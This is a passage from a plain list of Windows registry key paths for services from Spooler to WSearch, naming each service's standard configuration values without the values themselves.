HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Spooler\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\sppuinotify\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SstpSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\stisvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\StorSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\swprv\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TabletInputService\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TapiSrv\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TermService\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\THREADORDER\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TrustedInstaller\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UI0Detect\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\UmRdpService\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\vds\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wbengine\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wmiApSrv\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WMPNetworkSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WSearch\Start 